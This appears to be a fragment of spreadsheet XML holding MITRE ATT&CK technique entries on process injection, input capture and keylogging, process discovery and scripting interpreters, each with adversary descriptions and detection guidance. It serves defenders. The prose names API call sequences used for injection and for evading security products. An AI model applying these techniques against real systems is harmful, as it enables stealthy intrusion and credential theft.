Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>T1055.002</t>
  </si>
  <si>
    <t>Portable Executable Injection</t>
  </si>
  <si>
    <t>Process monitoring,API monitoring</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</si>
  <si>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and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Endgame Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. 
PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt;, then invoked with &lt;code&gt;CreateRemoteThread&lt;/code&gt; or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Endgame Process Injection July 2017) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>Anti-virus,Application control</t>
  </si>
  <si>
    <t>T1055.003</t>
  </si>
  <si>
    <t>Thread Execution Hijacking</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</si>
  <si>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&lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Endgame Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. 
Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as &lt;code&gt;OpenThread&lt;/code&gt;. At this point the process can be suspended then written to, realigned to the injected code, and resumed via &lt;code&gt;SuspendThread &lt;/code&gt;, &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, then &lt;code&gt;ResumeThread&lt;/code&gt; respectively.(Citation: Endgame Process Injection July 2017)
This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.  
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>T1055.004</t>
  </si>
  <si>
    <t>Asynchronous Procedure Call</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</si>
  <si>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&lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, &lt;code&gt;QueueUserAPC&lt;/code&gt;/&lt;code&gt;NtQueueApcThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Endgame Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. 
APC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as &lt;code&gt;OpenThread&lt;/code&gt;. At this point &lt;code&gt;QueueUserAPC&lt;/code&gt; can be used to invoke a function (such as &lt;code&gt;LoadLibrayA&lt;/code&gt; pointing to a malicious DLL). 
A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>T1055.005</t>
  </si>
  <si>
    <t>Thread Local Storage</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. 
TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>T1055.008</t>
  </si>
  <si>
    <t>Ptrace System Calls</t>
  </si>
  <si>
    <t>System calls,Process monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. 
Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: &lt;code&gt;malloc&lt;/code&gt;) then invoking that memory with &lt;code&gt;PTRACE_SETREGS&lt;/code&gt; to set the register containing the next instruction to execute. Ptrace system call injection can also be done with &lt;code&gt;PTRACE_POKETEXT&lt;/code&gt;/&lt;code&gt;PTRACE_POKEDATA&lt;/code&gt;, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) 
Ptrace system call injection may not be possible targeting processes with high-privileges, and on some system those that are non-child processes.(Citation: BH Linux Inject) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>T1055.009</t>
  </si>
  <si>
    <t>Proc Memory</t>
  </si>
  <si>
    <t xml:space="preserve">File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. 
Proc memory injection involves enumerating the memory of a process via the /proc filesystem (&lt;code&gt;/proc/[pid]&lt;/code&gt;) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within &lt;code&gt;/proc/[pid]/maps&lt;/code&gt; can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) 
Other techniques such as [LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>T1055.011</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</t>
  </si>
  <si>
    <t>Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Endgame Process Injection July 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. 
Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: 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allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as &lt;code&gt;WriteProcessMemory&lt;/code&gt; and &lt;code&gt;CreateRemoteThread&lt;/code&gt;.(Citation: Endgame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(Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>T1055.012</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  
Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as &lt;code&gt;CreateProcess&lt;/code&gt;, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as &lt;code&gt;ZwUnmapViewOfSection&lt;/code&gt; or &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;  before being written to, realigned to the injected code, and resumed via &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, then &lt;code&gt;ResumeThread&lt;/code&gt; respectively.(Citation: Leitch Hollowing)(Citation: Endgame Process Injection July 2017)
This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>T1055.013</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Monitor and analyze calls to &lt;code&gt;CreateTransaction&lt;/code&gt;, &lt;code&gt;CreateFileTransacted&lt;/code&gt;, &lt;code&gt;RollbackTransaction&lt;/code&gt;, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to &lt;code&gt;NtCreateProcessEx&lt;/code&gt; and &lt;code&gt;NtCreateThreadEx&lt;/code&gt; as well as API calls used to modify memory within another process, such as &lt;code&gt;WriteProcessMemory&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)
Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. 
Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: 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(Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)
Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)
Adversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;, &lt;code&gt;VirtualProtectEx&lt;/code&gt;, and &lt;code&gt;SetThreadContext&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017)
Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging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
This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>T1055.014</t>
  </si>
  <si>
    <t>VDSO Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. 
VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.  </t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Windows Registry,Windows event logs,User interface,Process command-line parameters,Process monitoring,PowerShell logs,Loaded DLLs,Kernel drivers,DLL monitoring,Binary file metadata,API monitoring</t>
  </si>
  <si>
    <t>Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.</t>
  </si>
  <si>
    <t>Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).</t>
  </si>
  <si>
    <t>collection,credential-access</t>
  </si>
  <si>
    <t>T1056.001</t>
  </si>
  <si>
    <t>Keylogging</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Windows,macOS,Linux,Network</t>
  </si>
  <si>
    <t>Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1056.002</t>
  </si>
  <si>
    <t>GUI Input Capture</t>
  </si>
  <si>
    <t>PowerShell logs,User interface,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).
Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as AppleScript(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015). </t>
  </si>
  <si>
    <t>T1056.003</t>
  </si>
  <si>
    <t>Web Portal Capture</t>
  </si>
  <si>
    <t>File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.</t>
  </si>
  <si>
    <t>Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)</t>
  </si>
  <si>
    <t>T1056.004</t>
  </si>
  <si>
    <t>Credential API Hooking</t>
  </si>
  <si>
    <t>Windows event logs,Process monitoring,Loaded DLLs,DLL monitoring,Binary file metadata,API monitoring</t>
  </si>
  <si>
    <t>Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
</t>
  </si>
  <si>
    <t>Process Discovery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</si>
  <si>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that look like process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</si>
  <si>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Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network.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t>
  </si>
  <si>
    <t>Command and Scripting Interpreter</t>
  </si>
  <si>
    <t>Windows event logs,PowerShell logs,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
If scripting is restricted for normal users, then any attempt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</si>
  <si>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Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.</t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>Windows event logs,Process monitoring,Process command-line parameters,PowerShell logs,Loaded DLLs,File monitoring,DLL monitoring</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</si>
  <si>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
Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.</t>
  </si>
  <si>
    <t>Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the &lt;code&gt;Start-Process&lt;/code&gt; cmdlet which can be used to run an executable and the &lt;code&gt;Invoke-Command&lt;/code&gt; cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the &lt;code&gt;powershell.exe&lt;/code&gt; binary through interfaces to PowerShell's underlying &lt;code&gt;System.Management.Automation&lt;/code&gt; assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)</t>
  </si>
  <si>
    <t>T1059.002</t>
  </si>
  <si>
    <t>AppleScript</t>
  </si>
  <si>
    <t>Monitor for execution of AppleScript through &lt;code&gt;osascript&lt;/code&gt; and usage of the &lt;code&gt;NSAppleScript&lt;/code&gt; and &lt;code&gt;OSAScript&lt;/code&gt; APIs that may be related to other suspicious behavior occurring on the system.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[Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
Understanding standard usage patterns is important to avoid a high number of false positives.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t>
  </si>
  <si>
    <t>Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding &lt;code&gt;#!/usr/bin/osascript&lt;/code&gt; to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call &lt;code&gt;osascript&lt;/code&gt; to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s &lt;code&gt;NSAppleScript&lt;/code&gt; or &lt;code&gt;OSAScript&lt;/code&gt;, both of which execute code independent of the &lt;code&gt;/usr/bin/osascript&lt;/code&gt; command line utility.
Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)</t>
  </si>
  <si>
    <t>T1059.003</t>
  </si>
  <si>
    <t>Windows Command Shell</t>
  </si>
  <si>
    <t>Windows event logs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt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</si>
  <si>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Adversaries may abuse the Windows command shell for execution. The Windows command shell (&lt;code&gt;cmd.exe&lt;/code&gt;) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. 
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
Adversaries may leverage &lt;code&gt;cmd.exe&lt;/code&gt; to execute various commands and payloads. Common uses include &lt;code&gt;cmd.exe /c&lt;/code&gt; to execute a single command, or abusing &lt;code&gt;cmd.exe&lt;/code&gt; interactively with input and output forwarded over a command and control channel.</t>
  </si>
  <si>
    <t>T1059.004</t>
  </si>
  <si>
    <t>Unix Shell</t>
  </si>
  <si>
    <t>macOS,Linux</t>
  </si>
  <si>
    <t xml:space="preserve">Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt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 </t>
  </si>
  <si>
    <t>Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.</t>
  </si>
  <si>
    <t>T1059.005</t>
  </si>
  <si>
    <t>Visual Basic</t>
  </si>
  <si>
    <t>DLL monitoring,Loaded DLLs,File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows,macOS,Linux</t>
  </si>
  <si>
